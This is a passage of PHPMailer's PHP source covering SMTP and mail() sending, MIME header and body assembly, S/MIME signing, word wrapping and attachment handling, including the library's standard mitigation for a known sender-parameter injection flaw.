*/ protected static function isPermittedPath($path) { return !preg_match('#^[a-z]+://#i', $path); } /** * Send mail using the PHP mail() function. * * @see http://www.php.net/manual/en/book.mail.php * * @param string $header The message headers * @param string $body The message body * * @throws Exception * * @return bool */ protected function mailSend($header, $body) { $header = rtrim($header, "\r\n ") . static::$LE . static::$LE; $toArr = []; foreach ($this->to as $toaddr) { $toArr[] = $this->addrFormat($toaddr); } $to = implode(', ', $toArr); $params = null; //This sets the SMTP envelope sender which gets turned into a return-path header by the receiver //A space after `-f` is optional, but there is a long history of its presence //causing problems, so we don't use one //Exim docs: http://www.exim.org/exim-html-current/doc/html/spec_html/ch-the_exim_command_line.html //Sendmail docs: http://www.sendmail.org/~ca/email/man/sendmail.html //Qmail docs: http://www.qmail.org/man/man8/qmail-inject.html //Example problem: https://www.drupal.org/node/1057954 // CVE-2016-10033, CVE-2016-10045: Don't pass -f if characters will be escaped. if (!empty($this->Sender) && static::validateAddress($this->Sender) && self::isShellSafe($this->Sender)) { $params = sprintf('-f%s', $this->Sender); } if (!empty($this->Sender) && static::validateAddress($this->Sender)) { $old_from = ini_get('sendmail_from'); ini_set('sendmail_from', $this->Sender); } $result = false; if ($this->SingleTo && count($toArr) > 1) { foreach ($toArr as $toAddr) { $result = $this->mailPassthru($toAddr, $this->Subject, $body, $header, $params); $this->doCallback($result, [$toAddr], $this->cc, $this->bcc, $this->Subject, $body, $this->From, []); } } else { $result = $this->mailPassthru($to, $this->Subject, $body, $header, $params); $this->doCallback($result, $this->to, $this->cc, $this->bcc, $this->Subject, $body, $this->From, []); } if (isset($old_from)) { ini_set('sendmail_from', $old_from); } if (!$result) { throw new Exception($this->lang('instantiate'), self::STOP_CRITICAL); } return true; } /** * Get an instance to use for SMTP operations. * Override this function to load your own SMTP implementation, * or set one with setSMTPInstance. * * @return SMTP */ public function getSMTPInstance() { if (!is_object($this->smtp)) { $this->smtp = new SMTP(); } return $this->smtp; } /** * Provide an instance to use for SMTP operations. * * @return SMTP */ public function setSMTPInstance(SMTP $smtp) { $this->smtp = $smtp; return $this->smtp; } /** * Send mail via SMTP. * Returns false if there is a bad MAIL FROM, RCPT, or DATA input. * * @see PHPMailer::setSMTPInstance() to use a different class. * * @uses \PHPMailer\PHPMailer\SMTP * * @param string $header The message headers * @param string $body The message body * * @throws Exception * * @return bool */ protected function smtpSend($header, $body) { $header = rtrim($header, "\r\n ") . static::$LE . static::$LE; $bad_rcpt = []; if (!$this->smtpConnect($this->SMTPOptions)) { throw new Exception($this->lang('smtp_connect_failed'), self::STOP_CRITICAL); } //Sender already validated in preSend() if ('' === $this->Sender) { $smtp_from = $this->From; } else { $smtp_from = $this->Sender; } if (!$this->smtp->mail($smtp_from)) { $this->setError($this->lang('from_failed') . $smtp_from . ' : ' . implode(',', $this->smtp->getError())); throw new Exception($this->ErrorInfo, self::STOP_CRITICAL); } $callbacks = []; // Attempt to send to all recipients foreach ([$this->to, $this->cc, $this->bcc] as $togroup) { foreach ($togroup as $to) { if (!$this->smtp->recipient($to[0], $this->dsn)) { $error = $this->smtp->getError(); $bad_rcpt[] = ['to' => $to[0], 'error' => $error['detail']]; $isSent = false; } else { $isSent = true; } $callbacks[] = ['issent'=>$isSent, 'to'=>$to[0]]; } } // Only send the DATA command if we have viable recipients if ((count($this->all_recipients) > count($bad_rcpt)) && !$this->smtp->data($header . $body)) { throw new Exception($this->lang('data_not_accepted'), self::STOP_CRITICAL); } $smtp_transaction_id = $this->smtp->getLastTransactionID(); if ($this->SMTPKeepAlive) { $this->smtp->reset(); } else { $this->smtp->quit(); $this->smtp->close(); } foreach ($callbacks as $cb) { $this->doCallback( $cb['issent'], [$cb['to']], [], [], $this->Subject, $body, $this->From, ['smtp_transaction_id' => $smtp_transaction_id] ); } //Create error message for any bad addresses if (count($bad_rcpt) > 0) { $errstr = ''; foreach ($bad_rcpt as $bad) { $errstr .= $bad['to'] . ': ' . $bad['error']; } throw new Exception($this->lang('recipients_failed') . $errstr, self::STOP_CONTINUE); } return true; } /** * Initiate a connection to an SMTP server. * Returns false if the operation failed. * * @param array $options An array of options compatible with stream_context_create() * * @throws Exception * * @uses \PHPMailer\PHPMailer\SMTP * * @return bool */ public function smtpConnect($options = null) { if (null === $this->smtp) { $this->smtp = $this->getSMTPInstance(); } //If no options are provided, use whatever is set in the instance if (null === $options) { $options = $this->SMTPOptions; } // Already connected? if ($this->smtp->connected()) { return true; } $this->smtp->setTimeout($this->Timeout); $this->smtp->setDebugLevel($this->SMTPDebug); $this->smtp->setDebugOutput($this->Debugoutput); $this->smtp->setVerp($this->do_verp); $hosts = explode(';', $this->Host); $lastexception = null; foreach ($hosts as $hostentry) { $hostinfo = []; if (!preg_match( '/^(?:(ssl|tls):\/\/)?(.+?)(?::(\d+))?$/', trim($hostentry), $hostinfo )) { $this->edebug($this->lang('invalid_hostentry') . ' ' . trim($hostentry)); // Not a valid host entry continue; } // $hostinfo[1]: optional ssl or tls prefix // $hostinfo[2]: the hostname // $hostinfo[3]: optional port number // The host string prefix can temporarily override the current setting for SMTPSecure // If it's not specified, the default value is used //Check the host name is a valid name or IP address before trying to use it if (!static::isValidHost($hostinfo[2])) { $this->edebug($this->lang('invalid_host') . ' ' . $hostinfo[2]); continue; } $prefix = ''; $secure = $this->SMTPSecure; $tls = (static::ENCRYPTION_STARTTLS === $this->SMTPSecure); if ('ssl' === $hostinfo[1] || ('' === $hostinfo[1] && static::ENCRYPTION_SMTPS === $this->SMTPSecure)) { $prefix = 'ssl://'; $tls = false; // Can't have SSL and TLS at the same time $secure = static::ENCRYPTION_SMTPS; } elseif ('tls' === $hostinfo[1]) { $tls = true; // tls doesn't use a prefix $secure = static::ENCRYPTION_STARTTLS; } //Do we need the OpenSSL extension? $sslext = defined('OPENSSL_ALGO_SHA256'); if (static::ENCRYPTION_STARTTLS === $secure || static::ENCRYPTION_SMTPS === $secure) { //Check for an OpenSSL constant rather than using extension_loaded, which is sometimes disabled if (!$sslext) { throw new Exception($this->lang('extension_missing') . 'openssl', self::STOP_CRITICAL); } } $host = $hostinfo[2]; $port = $this->Port; if (array_key_exists(3, $hostinfo) && is_numeric($hostinfo[3]) && $hostinfo[3] > 0 && $hostinfo[3] < 65536) { $port = (int) $hostinfo[3]; } if ($this->smtp->connect($prefix . $host, $port, $this->Timeout, $options)) { try { if ($this->Helo) { $hello = $this->Helo; } else { $hello = $this->serverHostname(); } $this->smtp->hello($hello); //Automatically enable TLS encryption if: // * it's not disabled // * we have openssl extension // * we are not already using SSL // * the server offers STARTTLS if ($this->SMTPAutoTLS && $sslext && 'ssl' !== $secure && $this->smtp->getServerExt('STARTTLS')) { $tls = true; } if ($tls) { if (!$this->smtp->startTLS()) { throw new Exception($this->lang('connect_host')); } // We must resend EHLO after TLS negotiation $this->smtp->hello($hello); } if ($this->SMTPAuth && !$this->smtp->authenticate( $this->Username, $this->Password, $this->AuthType, $this->oauth )) { throw new Exception($this->lang('authenticate')); } return true; } catch (Exception $exc) { $lastexception = $exc; $this->edebug($exc->getMessage()); // We must have connected, but then failed TLS or Auth, so close connection nicely $this->smtp->quit(); } } } // If we get here, all connection attempts have failed, so close connection hard $this->smtp->close(); // As we've caught all exceptions, just report whatever the last one was if ($this->exceptions && null !== $lastexception) { throw $lastexception; } return false; } /** * Close the active SMTP session if one exists. */ public function smtpClose() { if ((null !== $this->smtp) && $this->smtp->connected()) { $this->smtp->quit(); $this->smtp->close(); } } /** * Set the language for error messages. * Returns false if it cannot load the language file. * The default language is English. * * @param string $langcode ISO 639-1 2-character language code (e.g. French is "fr") * @param string $lang_path Path to the language file directory, with trailing separator (slash) * * @return bool */ public function setLanguage($langcode = 'en', $lang_path = '') { // Backwards compatibility for renamed language codes $renamed_langcodes = [ 'br' => 'pt_br', 'cz' => 'cs', 'dk' => 'da', 'no' => 'nb', 'se' => 'sv', 'rs' => 'sr', 'tg' => 'tl', ]; if (isset($renamed_langcodes[$langcode])) { $langcode = $renamed_langcodes[$langcode]; } // Define full set of translatable strings in English $PHPMAILER_LANG = [ 'authenticate' => 'SMTP Error: Could not authenticate.', 'connect_host' => 'SMTP Error: Could not connect to SMTP host.', 'data_not_accepted' => 'SMTP Error: data not accepted.', 'empty_message' => 'Message body empty', 'encoding' => 'Unknown encoding: ', 'execute' => 'Could not execute: ', 'file_access' => 'Could not access file: ', 'file_open' => 'File Error: Could not open file: ', 'from_failed' => 'The following From address failed: ', 'instantiate' => 'Could not instantiate mail function.', 'invalid_address' => 'Invalid address: ', 'invalid_hostentry' => 'Invalid hostentry: ', 'invalid_host' => 'Invalid host: ', 'mailer_not_supported' => ' mailer is not supported.', 'provide_address' => 'You must provide at least one recipient email address.', 'recipients_failed' => 'SMTP Error: The following recipients failed: ', 'signing' => 'Signing Error: ', 'smtp_connect_failed' => 'SMTP connect() failed.', 'smtp_error' => 'SMTP server error: ', 'variable_set' => 'Cannot set or reset variable: ', 'extension_missing' => 'Extension missing: ', ]; if (empty($lang_path)) { // Calculate an absolute path so it can work if CWD is not here $lang_path = dirname(__DIR__) . DIRECTORY_SEPARATOR . 'language' . DIRECTORY_SEPARATOR; } //Validate $langcode if (!preg_match('/^[a-z]{2}(?:_[a-zA-Z]{2})?$/', $langcode)) { $langcode = 'en'; } $foundlang = true; $lang_file = $lang_path . 'phpmailer.lang-' . $langcode . '.php'; // There is no English translation file if ('en' !== $langcode) { // Make sure language file path is readable if (!static::isPermittedPath($lang_file) || !file_exists($lang_file)) { $foundlang = false; } else { // Overwrite language-specific strings. // This way we'll never have missing translation keys. $foundlang = include $lang_file; } } $this->language = $PHPMAILER_LANG; return (bool) $foundlang; // Returns false if language not found } /** * Get the array of strings for the current language. * * @return array */ public function getTranslations() { return $this->language; } /** * Create recipient headers. * * @param string $type * @param array $addr An array of recipients, * where each recipient is a 2-element indexed array with element 0 containing an address * and element 1 containing a name, like: * [['joe@example.com', 'Joe User'], ['zoe@example.com', 'Zoe User']] * * @return string */ public function addrAppend($type, $addr) { $addresses = []; foreach ($addr as $address) { $addresses[] = $this->addrFormat($address); } return $type . ': ' . implode(', ', $addresses) . static::$LE; } /** * Format an address for use in a message header. * * @param array $addr A 2-element indexed array, element 0 containing an address, element 1 containing a name like * ['joe@example.com', 'Joe User'] * * @return string */ public function addrFormat($addr) { if (empty($addr[1])) { // No name provided return $this->secureHeader($addr[0]); } return $this->encodeHeader($this->secureHeader($addr[1]), 'phrase') . ' <' . $this->secureHeader($addr[0]) . '>'; } /** * Word-wrap message. * For use with mailers that do not automatically perform wrapping * and for quoted-printable encoded messages. * Original written by philippe. * * @param string $message The message to wrap * @param int $length The line length to wrap to * @param bool $qp_mode Whether to run in Quoted-Printable mode * * @return string */ public function wrapText($message, $length, $qp_mode = false) { if ($qp_mode) { $soft_break = sprintf(' =%s', static::$LE); } else { $soft_break = static::$LE; } // If utf-8 encoding is used, we will need to make sure we don't // split multibyte characters when we wrap $is_utf8 = static::CHARSET_UTF8 === strtolower($this->CharSet); $lelen = strlen(static::$LE); $crlflen = strlen(static::$LE); $message = static::normalizeBreaks($message); //Remove a trailing line break if (substr($message, -$lelen) === static::$LE) { $message = substr($message, 0, -$lelen); } //Split message into lines $lines = explode(static::$LE, $message); //Message will be rebuilt in here $message = ''; foreach ($lines as $line) { $words = explode(' ', $line); $buf = ''; $firstword = true; foreach ($words as $word) { if ($qp_mode && (strlen($word) > $length)) { $space_left = $length - strlen($buf) - $crlflen; if (!$firstword) { if ($space_left > 20) { $len = $space_left; if ($is_utf8) { $len = $this->utf8CharBoundary($word, $len); } elseif ('=' === substr($word, $len - 1, 1)) { --$len; } elseif ('=' === substr($word, $len - 2, 1)) { $len -= 2; } $part = substr($word, 0, $len); $word = substr($word, $len); $buf .= ' ' . $part; $message .= $buf . sprintf('=%s', static::$LE); } else { $message .= $buf . $soft_break; } $buf = ''; } while ($word !== '') { if ($length <= 0) { break; } $len = $length; if ($is_utf8) { $len = $this->utf8CharBoundary($word, $len); } elseif ('=' === substr($word, $len - 1, 1)) { --$len; } elseif ('=' === substr($word, $len - 2, 1)) { $len -= 2; } $part = substr($word, 0, $len); $word = (string) substr($word, $len); if ($word !== '') { $message .= $part . sprintf('=%s', static::$LE); } else { $buf = $part; } } } else { $buf_o = $buf; if (!$firstword) { $buf .= ' '; } $buf .= $word; if ('' !== $buf_o && strlen($buf) > $length) { $message .= $buf_o . $soft_break; $buf = $word; } } $firstword = false; } $message .= $buf . static::$LE; } return $message; } /** * Find the last character boundary prior to $maxLength in a utf-8 * quoted-printable encoded string. * Original written by Colin Brown. * * @param string $encodedText utf-8 QP text * @param int $maxLength Find the last character boundary prior to this length * * @return int */ public function utf8CharBoundary($encodedText, $maxLength) { $foundSplitPos = false; $lookBack = 3; while (!$foundSplitPos) { $lastChunk = substr($encodedText, $maxLength - $lookBack, $lookBack); $encodedCharPos = strpos($lastChunk, '='); if (false !== $encodedCharPos) { // Found start of encoded character byte within $lookBack block. // Check the encoded byte value (the 2 chars after the '=') $hex = substr($encodedText, $maxLength - $lookBack + $encodedCharPos + 1, 2); $dec = hexdec($hex); if ($dec < 128) { // Single byte character. // If the encoded char was found at pos 0, it will fit // otherwise reduce maxLength to start of the encoded char if ($encodedCharPos > 0) { $maxLength -= $lookBack - $encodedCharPos; } $foundSplitPos = true; } elseif ($dec >= 192) { // First byte of a multi byte character // Reduce maxLength to split at start of character $maxLength -= $lookBack - $encodedCharPos; $foundSplitPos = true; } elseif ($dec < 192) { // Middle byte of a multi byte character, look further back $lookBack += 3; } } else { // No encoded character found $foundSplitPos = true; } } return $maxLength; } /** * Apply word wrapping to the message body. * Wraps the message body to the number of chars set in the WordWrap property. * You should only do this to plain-text bodies as wrapping HTML tags may break them. * This is called automatically by createBody(), so you don't need to call it yourself. */ public function setWordWrap() { if ($this->WordWrap < 1) { return; } switch ($this->message_type) { case 'alt': case 'alt_inline': case 'alt_attach': case 'alt_inline_attach': $this->AltBody = $this->wrapText($this->AltBody, $this->WordWrap); break; default: $this->Body = $this->wrapText($this->Body, $this->WordWrap); break; } } /** * Assemble message headers. * * @return string The assembled headers */ public function createHeader() { $result = ''; $result .= $this->headerLine('Date', '' === $this->MessageDate ? self::rfcDate() : $this->MessageDate); // To be created automatically by mail() if ($this->SingleTo) { if ('mail' !== $this->Mailer) { foreach ($this->to as $toaddr) { $this->SingleToArray[] = $this->addrFormat($toaddr); } } } elseif (count($this->to) > 0) { if ('mail' !== $this->Mailer) { $result .= $this->addrAppend('To', $this->to); } } elseif (count($this->cc) === 0) { $result .= $this->headerLine('To', 'undisclosed-recipients:;'); } $result .= $this->addrAppend('From', [[trim($this->From), $this->FromName]]); // sendmail and mail() extract Cc from the header before sending if (count($this->cc) > 0) { $result .= $this->addrAppend('Cc', $this->cc); } // sendmail and mail() extract Bcc from the header before sending if (( 'sendmail' === $this->Mailer || 'qmail' === $this->Mailer || 'mail' === $this->Mailer ) && count($this->bcc) > 0 ) { $result .= $this->addrAppend('Bcc', $this->bcc); } if (count($this->ReplyTo) > 0) { $result .= $this->addrAppend('Reply-To', $this->ReplyTo); } // mail() sets the subject itself if ('mail' !== $this->Mailer) { $result .= $this->headerLine('Subject', $this->encodeHeader($this->secureHeader($this->Subject))); } // Only allow a custom message ID if it conforms to RFC 5322 section 3.6.4 // https://tools.ietf.org/html/rfc5322#section-3.6.4 if ('' !== $this->MessageID && preg_match('/^<.*@.*>$/', $this->MessageID)) { $this->lastMessageID = $this->MessageID; } else { $this->lastMessageID = sprintf('<%s@%s>', $this->uniqueid, $this->serverHostname()); } $result .= $this->headerLine('Message-ID', $this->lastMessageID); if (null !== $this->Priority) { $result .= $this->headerLine('X-Priority', $this->Priority); } if ('' === $this->XMailer) { $result .= $this->headerLine( 'X-Mailer', 'PHPMailer ' . self::VERSION . ' (https://github.com/PHPMailer/PHPMailer)' ); } else { $myXmailer = trim($this->XMailer); if ($myXmailer) { $result .= $this->headerLine('X-Mailer', $myXmailer); } } if ('' !== $this->ConfirmReadingTo) { $result .= $this->headerLine('Disposition-Notification-To', '<' . $this->ConfirmReadingTo . '>'); } // Add custom headers foreach ($this->CustomHeader as $header) { $result .= $this->headerLine( trim($header[0]), $this->encodeHeader(trim($header[1])) ); } if (!$this->sign_key_file) { $result .= $this->headerLine('MIME-Version', '1.0'); $result .= $this->getMailMIME(); } return $result; } /** * Get the message MIME type headers. * * @return string */ public function getMailMIME() { $result = ''; $ismultipart = true; switch ($this->message_type) { case 'inline': $result .= $this->headerLine('Content-Type', static::CONTENT_TYPE_MULTIPART_RELATED . ';'); $result .= $this->textLine(' boundary="' . $this->boundary[1] . '"'); break; case 'attach': case 'inline_attach': case 'alt_attach': case 'alt_inline_attach': $result .= $this->headerLine('Content-Type', static::CONTENT_TYPE_MULTIPART_MIXED . ';'); $result .= $this->textLine(' boundary="' . $this->boundary[1] . '"'); break; case 'alt': case 'alt_inline': $result .= $this->headerLine('Content-Type', static::CONTENT_TYPE_MULTIPART_ALTERNATIVE . ';'); $result .= $this->textLine(' boundary="' . $this->boundary[1] . '"'); break; default: // Catches case 'plain': and case '': $result .= $this->textLine('Content-Type: ' . $this->ContentType . '; charset=' . $this->CharSet); $ismultipart = false; break; } // RFC1341 part 5 says 7bit is assumed if not specified if (static::ENCODING_7BIT !== $this->Encoding) { // RFC 2045 section 6.4 says multipart MIME parts may only use 7bit, 8bit or binary CTE if ($ismultipart) { if (static::ENCODING_8BIT === $this->Encoding) { $result .= $this->headerLine('Content-Transfer-Encoding', static::ENCODING_8BIT); } // The only remaining alternatives are quoted-printable and base64, which are both 7bit compatible } else { $result .= $this->headerLine('Content-Transfer-Encoding', $this->Encoding); } } if ('mail' !== $this->Mailer) { // $result .= static::$LE; } return $result; } /** * Returns the whole MIME message. * Includes complete headers and body. * Only valid post preSend(). * * @see PHPMailer::preSend() * * @return string */ public function getSentMIMEMessage() { return rtrim($this->MIMEHeader . $this->mailHeader, "\n\r") . static::$LE . static::$LE . $this->MIMEBody; } /** * Create a unique ID to use for boundaries. * * @return string */ protected function generateId() { $len = 32; //32 bytes = 256 bits $bytes = ''; if (function_exists('random_bytes')) { try { $bytes = random_bytes($len); } catch (\Exception $e) { //Do nothing } } elseif (function_exists('openssl_random_pseudo_bytes')) { /** @noinspection CryptographicallySecureRandomnessInspection */ $bytes = openssl_random_pseudo_bytes($len); } if ($bytes === '') { //We failed to produce a proper random string, so make do. //Use a hash to force the length to the same as the other methods $bytes = hash('sha256', uniqid((string) mt_rand(), true), true); } //We don't care about messing up base64 format here, just want a random string return str_replace(['=', '+', '/'], '', base64_encode(hash('sha256', $bytes, true))); } /** * Assemble the message body. * Returns an empty string on failure. * * @throws Exception * * @return string The assembled message body */ public function createBody() { $body = ''; //Create unique IDs and preset boundaries $this->uniqueid = $this->generateId(); $this->boundary[1] = 'b1_' . $this->uniqueid; $this->boundary[2] = 'b2_' . $this->uniqueid; $this->boundary[3] = 'b3_' . $this->uniqueid; if ($this->sign_key_file) { $body .= $this->getMailMIME() . static::$LE; } $this->setWordWrap(); $bodyEncoding = $this->Encoding; $bodyCharSet = $this->CharSet; //Can we do a 7-bit downgrade? if (static::ENCODING_8BIT === $bodyEncoding && !$this->has8bitChars($this->Body)) { $bodyEncoding = static::ENCODING_7BIT; //All ISO 8859, Windows codepage and UTF-8 charsets are ascii compatible up to 7-bit $bodyCharSet = static::CHARSET_ASCII; } //If lines are too long, and we're not already using an encoding that will shorten them, //change to quoted-printable transfer encoding for the body part only if (static::ENCODING_BASE64 !== $this->Encoding && static::hasLineLongerThanMax($this->Body)) { $bodyEncoding = static::ENCODING_QUOTED_PRINTABLE; } $altBodyEncoding = $this->Encoding; $altBodyCharSet = $this->CharSet; //Can we do a 7-bit downgrade? if (static::ENCODING_8BIT === $altBodyEncoding && !$this->has8bitChars($this->AltBody)) { $altBodyEncoding = static::ENCODING_7BIT; //All ISO 8859, Windows codepage and UTF-8 charsets are ascii compatible up to 7-bit $altBodyCharSet = static::CHARSET_ASCII; } //If lines are too long, and we're not already using an encoding that will shorten them, //change to quoted-printable transfer encoding for the alt body part only if (static::ENCODING_BASE64 !== $altBodyEncoding && static::hasLineLongerThanMax($this->AltBody)) { $altBodyEncoding = static::ENCODING_QUOTED_PRINTABLE; } //Use this as a preamble in all multipart message types $mimepre = 'This is a multi-part message in MIME format.' . static::$LE; switch ($this->message_type) { case 'inline': $body .= $mimepre; $body .= $this->getBoundary($this->boundary[1], $bodyCharSet, '', $bodyEncoding); $body .= $this->encodeString($this->Body, $bodyEncoding); $body .= static::$LE; $body .= $this->attachAll('inline', $this->boundary[1]); break; case 'attach': $body .= $mimepre; $body .= $this->getBoundary($this->boundary[1], $bodyCharSet, '', $bodyEncoding); $body .= $this->encodeString($this->Body, $bodyEncoding); $body .= static::$LE; $body .= $this->attachAll('attachment', $this->boundary[1]); break; case 'inline_attach': $body .= $mimepre; $body .= $this->textLine('--' . $this->boundary[1]); $body .= $this->headerLine('Content-Type', static::CONTENT_TYPE_MULTIPART_RELATED . ';'); $body .= $this->textLine(' boundary="' . $this->boundary[2] . '";'); $body .= $this->textLine(' type="' . static::CONTENT_TYPE_TEXT_HTML . '"'); $body .= static::$LE; $body .= $this->getBoundary($this->boundary[2], $bodyCharSet, '', $bodyEncoding); $body .= $this->encodeString($this->Body, $bodyEncoding); $body .= static::$LE; $body .= $this->attachAll('inline', $this->boundary[2]); $body .= static::$LE; $body .= $this->attachAll('attachment', $this->boundary[1]); break; case 'alt': $body .= $mimepre; $body .= $this->getBoundary( $this->boundary[1], $altBodyCharSet, static::CONTENT_TYPE_PLAINTEXT, $altBodyEncoding ); $body .= $this->encodeString($this->AltBody, $altBodyEncoding); $body .= static::$LE; $body .= $this->getBoundary( $this->boundary[1], $bodyCharSet, static::CONTENT_TYPE_TEXT_HTML, $bodyEncoding ); $body .= $this->encodeString($this->Body, $bodyEncoding); $body .= static::$LE; if (!empty($this->Ical)) { $method = static::ICAL_METHOD_REQUEST; foreach (static::$IcalMethods as $imethod) { if (stripos($this->Ical, 'METHOD:' . $imethod) !== false) { $method = $imethod; break; } } $body .= $this->getBoundary( $this->boundary[1], '', static::CONTENT_TYPE_TEXT_CALENDAR . '; method=' . $method, '' ); $body .= $this->encodeString($this->Ical, $this->Encoding); $body .= static::$LE; } $body .= $this->endBoundary($this->boundary[1]); break; case 'alt_inline': $body .= $mimepre; $body .= $this->getBoundary( $this->boundary[1], $altBodyCharSet, static::CONTENT_TYPE_PLAINTEXT, $altBodyEncoding ); $body .= $this->encodeString($this->AltBody, $altBodyEncoding); $body .= static::$LE; $body .= $this->textLine('--' . $this->boundary[1]); $body .= $this->headerLine('Content-Type', static::CONTENT_TYPE_MULTIPART_RELATED . ';'); $body .= $this->textLine(' boundary="' . $this->boundary[2] . '";'); $body .= $this->textLine(' type="' . static::CONTENT_TYPE_TEXT_HTML . '"'); $body .= static::$LE; $body .= $this->getBoundary( $this->boundary[2], $bodyCharSet, static::CONTENT_TYPE_TEXT_HTML, $bodyEncoding ); $body .= $this->encodeString($this->Body, $bodyEncoding); $body .= static::$LE; $body .= $this->attachAll('inline', $this->boundary[2]); $body .= static::$LE; $body .= $this->endBoundary($this->boundary[1]); break; case 'alt_attach': $body .= $mimepre; $body .= $this->textLine('--' . $this->boundary[1]); $body .= $this->headerLine('Content-Type', static::CONTENT_TYPE_MULTIPART_ALTERNATIVE . ';'); $body .= $this->textLine(' boundary="' . $this->boundary[2] . '"'); $body .= static::$LE; $body .= $this->getBoundary( $this->boundary[2], $altBodyCharSet, static::CONTENT_TYPE_PLAINTEXT, $altBodyEncoding ); $body .= $this->encodeString($this->AltBody, $altBodyEncoding); $body .= static::$LE; $body .= $this->getBoundary( $this->boundary[2], $bodyCharSet, static::CONTENT_TYPE_TEXT_HTML, $bodyEncoding ); $body .= $this->encodeString($this->Body, $bodyEncoding); $body .= static::$LE; if (!empty($this->Ical)) { $method = static::ICAL_METHOD_REQUEST; foreach (static::$IcalMethods as $imethod) { if (stripos($this->Ical, 'METHOD:' . $imethod) !== false) { $method = $imethod; break; } } $body .= $this->getBoundary( $this->boundary[2], '', static::CONTENT_TYPE_TEXT_CALENDAR . '; method=' . $method, '' ); $body .= $this->encodeString($this->Ical, $this->Encoding); } $body .= $this->endBoundary($this->boundary[2]); $body .= static::$LE; $body .= $this->attachAll('attachment', $this->boundary[1]); break; case 'alt_inline_attach': $body .= $mimepre; $body .= $this->textLine('--' . $this->boundary[1]); $body .= $this->headerLine('Content-Type', static::CONTENT_TYPE_MULTIPART_ALTERNATIVE . ';'); $body .= $this->textLine(' boundary="' . $this->boundary[2] . '"'); $body .= static::$LE; $body .= $this->getBoundary( $this->boundary[2], $altBodyCharSet, static::CONTENT_TYPE_PLAINTEXT, $altBodyEncoding ); $body .= $this->encodeString($this->AltBody, $altBodyEncoding); $body .= static::$LE; $body .= $this->textLine('--' . $this->boundary[2]); $body .= $this->headerLine('Content-Type', static::CONTENT_TYPE_MULTIPART_RELATED . ';'); $body .= $this->textLine(' boundary="' . $this->boundary[3] . '";'); $body .= $this->textLine(' type="' . static::CONTENT_TYPE_TEXT_HTML . '"'); $body .= static::$LE; $body .= $this->getBoundary( $this->boundary[3], $bodyCharSet, static::CONTENT_TYPE_TEXT_HTML, $bodyEncoding ); $body .= $this->encodeString($this->Body, $bodyEncoding); $body .= static::$LE; $body .= $this->attachAll('inline', $this->boundary[3]); $body .= static::$LE; $body .= $this->endBoundary($this->boundary[2]); $body .= static::$LE; $body .= $this->attachAll('attachment', $this->boundary[1]); break; default: // Catch case 'plain' and case '', applies to simple `text/plain` and `text/html` body content types //Reset the `Encoding` property in case we changed it for line length reasons $this->Encoding = $bodyEncoding; $body .= $this->encodeString($this->Body, $this->Encoding); break; } if ($this->isError()) { $body = ''; if ($this->exceptions) { throw new Exception($this->lang('empty_message'), self::STOP_CRITICAL); } } elseif ($this->sign_key_file) { try { if (!defined('PKCS7_TEXT')) { throw new Exception($this->lang('extension_missing') . 'openssl'); } $file = tempnam(sys_get_temp_dir(), 'srcsign'); $signed = tempnam(sys_get_temp_dir(), 'mailsign'); file_put_contents($file, $body); //Workaround for PHP bug https://bugs.php.net/bug.php?id=69197 if (empty($this->sign_extracerts_file)) { $sign = @openssl_pkcs7_sign( $file, $signed, 'file://' . realpath($this->sign_cert_file), ['file://' . realpath($this->sign_key_file), $this->sign_key_pass], [] ); } else { $sign = @openssl_pkcs7_sign( $file, $signed, 'file://' . realpath($this->sign_cert_file), ['file://' . realpath($this->sign_key_file), $this->sign_key_pass], [], PKCS7_DETACHED, $this->sign_extracerts_file ); } @unlink($file); if ($sign) { $body = file_get_contents($signed); @unlink($signed); //The message returned by openssl contains both headers and body, so need to split them up $parts = explode("\n\n", $body, 2); $this->MIMEHeader .= $parts[0] . static::$LE . static::$LE; $body = $parts[1]; } else { @unlink($signed); throw new Exception($this->lang('signing') . openssl_error_string()); } } catch (Exception $exc) { $body = ''; if ($this->exceptions) { throw $exc; } } } return $body; } /** * Return the start of a message boundary. * * @param string $boundary * @param string $charSet * @param string $contentType * @param string $encoding * * @return string */ protected function getBoundary($boundary, $charSet, $contentType, $encoding) { $result = ''; if ('' === $charSet) { $charSet = $this->CharSet; } if ('' === $contentType) { $contentType = $this->ContentType; } if ('' === $encoding) { $encoding = $this->Encoding; } $result .= $this->textLine('--' . $boundary); $result .= sprintf('Content-Type: %s; charset=%s', $contentType, $charSet); $result .= static::$LE; // RFC1341 part 5 says 7bit is assumed if not specified if (static::ENCODING_7BIT !== $encoding) { $result .= $this->headerLine('Content-Transfer-Encoding', $encoding); } $result .= static::$LE; return $result; } /** * Return the end of a message boundary. * * @param string $boundary * * @return string */ protected function endBoundary($boundary) { return static::$LE . '--' . $boundary . '--' . static::$LE; } /** * Set the message type. * PHPMailer only supports some preset message types, not arbitrary MIME structures. */ protected function setMessageType() { $type = []; if ($this->alternativeExists()) { $type[] = 'alt'; } if ($this->inlineImageExists()) { $type[] = 'inline'; } if ($this->attachmentExists()) { $type[] = 'attach'; } $this->message_type = implode('_', $type); if ('' === $this->message_type) { //The 'plain' message_type refers to the message having a single body element, not that it is plain-text $this->message_type = 'plain'; } } /** * Format a header line. * * @param string $name * @param string|int $value * * @return string */ public function headerLine($name, $value) { return $name . ': ' . $value . static::$LE; } /** * Return a formatted mail line. * * @param string $value * * @return string */ public function textLine($value) { return $value . static::$LE; } /** * Add an attachment from a path on the filesystem. * Never use a user-supplied path to a file! * Returns false if the file could not be found or read. * Explicitly *does not* support passing URLs; PHPMailer is not an HTTP client. * If you need to do that, fetch the resource yourself and pass it in via a local file or string. * * @param string $path Path to the attachment * @param string $name Overrides the attachment name * @param string $encoding File encoding (see $Encoding) * @param string $type File extension (MIME) type * @param string $disposition Disposition to use * * @throws Exception * * @return bool */ public function addAttachment( $path, $name = '', $encoding = self::ENCODING_BASE64, $type = '', $disposition = 'attachment' ) { try { if (!static::isPermittedPath($path) || !@is_file($path)) { throw new Exception($this->lang('file_access') . $path, self::STOP_CONTINUE); } // If a MIME type is not specified, try to work it out from the file name if ('' === $type) { $type = static::filenameToType($path); } $filename = (string) static::mb_pathinfo($path, PATHINFO_BASENAME); if ('' === $name) { $name = $filename; } if (!$this->validateEncoding($encoding)) { throw new Exception($this->lang('encoding') . $encoding); } $this->attachment[] = [ 0 => $path, 1 => $filename, 2 => $name, 3 => $encoding, 4 => $type, 5 => false, // isStringAttachment 6 => $disposition, 7 => $name, ]; } catch (Exception $exc) { $this->setError($exc->getMessage()); $this->edebug($exc->getMessage()); if ($this->exceptions) { throw $exc; } return false; } return true; } /** * Return the array of attachments. * * @return array */ public function getAttachments() { return $this->attachment; } /** * Attach all file, string, and binary attachments to the message. * Returns an empty string on failure. * * @param string 